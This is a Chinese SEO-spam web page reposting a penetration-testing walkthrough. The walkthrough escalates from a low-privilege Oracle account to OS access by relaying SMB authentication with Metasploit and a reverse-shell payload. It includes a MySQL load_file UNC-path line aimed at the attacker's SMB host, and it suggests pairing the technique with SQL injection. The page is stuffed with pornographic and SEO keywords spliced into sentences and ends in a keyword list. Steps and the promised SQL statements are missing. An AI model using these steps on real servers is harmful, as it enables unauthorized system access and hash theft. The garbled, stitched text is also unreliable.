久久机这里只有精品,国产69精品一区二区亚洲孕妇,91精品国产综合久久婷婷香蕉,午夜久久久久久电影

最新活動:電腦PC端+手機端+微網站+自適應網頁多模板選擇-建站388元起價!??!
當前位置:主頁 > 網站建設 > Oracle 低權限數據庫賬戶得到 OS 訪問權限 提權利

Oracle 低權限數據庫賬戶得到 OS 訪問權限 提權利

時間:2023-05-22 18:05:22 閱讀: 文章分類: 網站建設 作者: 網站編輯員

導讀:1建站知識大概意思就是說,如果 ORACLE 服務是用 administrator 賬戶啟動的,你只要有一個具有 resource 和 connect 權限的數據庫賬戶,網站優化seo培訓seo網站優化培訓。

網站優化seo培訓seo網站優化培訓

這幾天看了篇叫"Penetration: from ap網站建設plication down to OS (Oracle)"的文檔,感覺挺有意思的,文檔的 大概意思就是說,如果 ORACLE 服務是用 administrator 賬戶啟動的,你只要有一個具有 resource 和 connect 權限的數據庫賬戶,就能利用 metasploit 的 smbrelay 功能,本地搭建一個 SMB 欺騙服務器, 來得到系統的訪問權限。我本地測試了下,還真的成功了。:-)

具體的原理分析看原文吧,我這里把我的測試過程寫出來.

我的滲透環境用的是 ubuntu8.10+metasploit 3.3 dev,oracle 數據庫版本為 10.2.0.1.0,服務啟動權限為 administrator,數據庫賬戶用的是如何seo優化推廣網站 dbsnmp 賬戶的默認權限.

1網站seo優化課程.先用 netstat 命令查看一下,本地的 139 端口有沒有占用,一般占用此端口的服務就是 Samba 了,要關掉。ubuntu 的關閉方法是 sudo /etc/init.d/samba stop<p>

2.運行 metasploit,我選用的 PAYLOAD 是 shell_reverse_tcp,做好相應配置后,exploit.就能用 netstat 看到本地已經監聽了 139 和 8522 端口了.

4.然后執行下面 3 條 SQL 語句

mysql,如果服務也是 administrator 啟動的,用select load_file('\\\\192.168.1.52\mk.txt')也是可以得到系統權限的.MSSQL 應該用 xp_dirtree 存儲過程 也是可以的,不過我沒有配置出來用 administrator 賬戶啟動 MSSQL 服務,希望知道的朋友指點下我。

這個技術可以用到內網 WEB 評估的時候,如果有注入,服務又是 administrator 啟動的,可以提權了。

兩個PDF下載,

作者:Mickey(Oracle%20database).pdf

當執行完 create index 這句的時候,在看咱們本地的 metasploit,就已經得到 ORACLE 數據庫主機的系 統當前服務用戶的 half lm 哈希和 cmdshell 了。

相關網站優化seo培訓seo網站優化培訓。

關鍵詞標簽: 訪問權限 賬戶

聲明: 本文由我的SEOUC技術文章主頁發布于:2023-05-22 ,文章Oracle 低權限數據庫賬戶得到 OS 訪問權限 提權利主要講述賬戶,訪問權限,Oracle 低權限數據庫賬戶得到 OS 訪網站建設源碼以及服務器配置搭建相關技術文章。轉載請保留鏈接: http://www.bifwcx.com/article/web_4984.html

我的IDC 網站建設技術SEOUC.COM
專注網站建設,SEO優化,小程序設計制作搭建開發定制網站等,數千家網站定制開發案例,網站推廣技術服務。
  • 5000+合作客服
  • 8年從業經驗
  • 150+覆蓋行業
  • 最新熱門源碼技術文章

    主站蜘蛛池模板: 二手房| 牟定县| 玉山县| 永平县| 社会| 阿克陶县| 湖州市| 凤台县| 郑州市| 北票市| 东源县| 阿拉善左旗| 玉树县| 巨野县| 福安市| 洱源县| 全南县| 遂溪县| 宁晋县| 叙永县| 阳江市| 汝阳县| 隆昌县| 商南县| 明溪县| 东辽县| 绥阳县| 兴义市| 闻喜县| 蓝田县| 营山县| 启东市| 昌乐县| 嘉兴市| 噶尔县| 泰和县| 策勒县| 裕民县| 兴山县| 杨浦区| 榕江县|